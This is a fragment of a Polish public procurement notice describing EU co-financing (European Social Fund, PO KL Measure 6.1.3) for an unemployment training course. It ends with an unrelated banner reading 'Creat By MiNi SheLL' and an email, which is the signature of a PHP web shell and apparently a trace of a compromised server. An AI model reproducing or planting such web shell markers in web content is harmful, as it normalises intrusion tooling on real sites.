<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenie będzie współfinansowane ze środków Europejskiego Funduszu Społecznego w ramach projektu systemowego PO KAPITAŁ realizowanego w ramach Priorytetu VI PO KL: Rynek pracy otwarty dla wszystkich, Działanie 6.1: Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.3: Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych PO KL..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com